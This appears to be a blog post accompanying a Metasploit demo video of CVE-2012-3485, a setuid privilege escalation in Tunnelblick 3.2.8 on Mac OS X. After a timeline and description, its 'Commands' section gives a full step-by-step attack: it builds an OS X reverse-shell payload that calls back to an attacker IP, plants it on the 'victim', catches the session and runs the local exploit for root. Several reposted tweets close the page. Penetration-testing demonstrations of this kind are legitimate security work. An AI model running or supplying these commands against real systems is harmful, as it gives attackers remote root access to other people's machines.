Timeline :
Vulnerability discovered and reported to the vendor by Jason A. Donenfeld the 2012-08-11
Metasploit PoC provided the 2013-03-03
PoC provided by :
Jason A. Donenfeld
juan vazquez
Reference(s) :
Affected version(s) :
Tunnelblick 3.2.8 and previous
Tested on Mac OS X 10.7.5 x64 with :
Tunnelblick 3.2.8
Description :
This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability exists in the setuid openvpnstart, where an insufficient validation of path names allows execution of arbitrary shell scripts as root. This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 over Mac OS X 10.7.5.
Commands :
Create a OS X x86 payload with msfpayload msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > osx-payload Upload this payload on the victim OS X 10.7.5 use exploit/multi/handler set PAYLOAD osx/x86/shell_reverse_tcp set LHOST 192.168.178.26 exploit -j Execute osx-payload, a session will be created. This session runs with current user privileges. use exploit/osx/local/setuid_tunnelblick set SESSION 1 set PAYLOAD osx/x86/shell_reverse_tcp set LPORT 4445 set LHOST 192.168.178.26 exploit id
@eromang #Exploit #Video: #CVE-2012-3485 Setuid Tunnelblick Privilege Escalation #msf Demo http://t.co/iSvbnddEjv http://t.co/k2qdV2Npoc
RT @Glesec: CVE-2012-3485 Setuid #Tunnelblick Privilege Escalation #Metasploit Demo | Eric Romang http://t.co/I9UVsulSXP #Pentesting
CVE-2012-3485 Setuid #Tunnelblick Privilege Escalation #Metasploit Demo | Eric Romang http://t.co/I9UVsulSXP #Pentesting
CVE-2012-3485 Setuid #Tunnelblick Privilege Escalation #Metasploit Demo | Eric Romang http://t.co/wCqHc9ceCd #Pentesting